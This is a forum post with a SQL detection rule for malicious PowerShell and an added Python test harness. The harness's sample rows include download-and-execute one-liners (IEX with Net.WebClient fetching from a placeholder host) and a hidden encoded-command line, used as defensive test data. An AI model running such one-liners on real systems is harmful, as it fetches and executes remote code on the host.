
Malicious Powershell

Description: Detecting malicious PowerShell.

What The Data Shows: Looking for PowerShell arguments that can be linked to malicious executions.

SQL: 

-- Flag powershell.exe processes whose command line carries all three markers:
-- an "enc" fragment (e.g. -enc / -EncodedCommand), IEX (Invoke-Expression)
-- and "web" (e.g. Net.WebClient). Straight ASCII quotes are required; curly
-- quotes break the query when pasted.
SELECT *
FROM processes
WHERE cmdline LIKE "%enc%"
AND cmdline LIKE "%IEX%"
AND cmdline LIKE "%web%"
AND name = "powershell.exe"
0 Votes
3 Comments
Community Manager
Status changed to: Approved
New Contributor

This script is using the right and left double quotation mark characters instead of the quotation mark character. If copied and pasted, the script won't run.

The amended version is:

SELECT *
FROM processes
WHERE cmdline LIKE "%enc%"
AND cmdline LIKE "%IEX%"
AND cmdline LIKE "%web%"
AND name = "powershell.exe"
Carbon Black Employee

@hardcoded Thanks for catching that and posting a fix! I did fix the original too.
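To see what the query above actually catches, here is an added example (not from the original post or from Carbon Black) that loads a handful of constructed process rows into an in-memory SQLite database, the engine osquery uses, and runs the same predicate. It assumes a `processes` table with `pid`, `name` and `cmdline` columns and uses single-quoted string literals, which standard SQL requires (SQLite only tolerates the post's double quotes through a legacy fallback); the command lines and the `example.invalid` URL are made up for the test.

```python
import sqlite3

# Constructed sample rows (pid, name, cmdline); none are real captures.
SAMPLE_PROCESSES = [
    # 1: plain download-and-execute one-liner; "Encoding" supplies the "enc" substring
    (1, "powershell.exe",
     "powershell.exe -NoProfile -w hidden -c \"IEX ([Text.Encoding]::UTF8.GetString("
     "(New-Object Net.WebClient).DownloadData('http://example.invalid/p')))\""),
    # 2: fully encoded payload: the IEX/web markers are hidden inside base64, so the
    #    three-way AND misses it (coverage gap of the rule as written)
    (2, "powershell.exe", "powershell.exe -nop -w hidden -enc BASE64-PLACEHOLDER"),
    # 3: same one-liner under PowerShell 7; the name filter only covers powershell.exe
    (3, "pwsh.exe",
     "pwsh.exe -NoProfile -c \"IEX ([Text.Encoding]::UTF8.GetString("
     "(New-Object Net.WebClient).DownloadData('http://example.invalid/p')))\""),
    # 4: benign scheduled script, must not match
    (4, "powershell.exe",
     r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\Backup.ps1"),
    # 5: lowercase variant of row 1; SQLite LIKE is case-insensitive for ASCII,
    #    so "iex" still satisfies LIKE '%IEX%'
    (5, "powershell.exe",
     "powershell.exe -c \"iex ([text.encoding]::utf8.getstring("
     "(new-object net.webclient).downloaddata('http://example.invalid/p')))\""),
]

# The post's query with standard single-quoted literals and a stable ordering.
QUERY = """
SELECT pid, name, cmdline
FROM processes
WHERE cmdline LIKE '%enc%'
  AND cmdline LIKE '%IEX%'
  AND cmdline LIKE '%web%'
  AND name = 'powershell.exe'
ORDER BY pid
"""


def build_db(rows=SAMPLE_PROCESSES):
    """Create an in-memory table shaped like osquery's processes table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE processes (pid INTEGER, name TEXT, cmdline TEXT)")
    conn.executemany("INSERT INTO processes VALUES (?, ?, ?)", rows)
    return conn


def run_detection(rows=SAMPLE_PROCESSES):
    """Return the pids the rule flags; expected [1, 5] for the sample above."""
    with build_db(rows) as conn:
        return [pid for (pid, _name, _cmdline) in conn.execute(QUERY)]


if __name__ == "__main__":
    print("flagged pids:", run_detection())
```

Rows 2 and 3 are the ones to keep in mind when tuning: an encoded-only command line and a `pwsh.exe` host both slip past this rule, so a broader name filter or a separate rule for `-enc` alone may be worth adding.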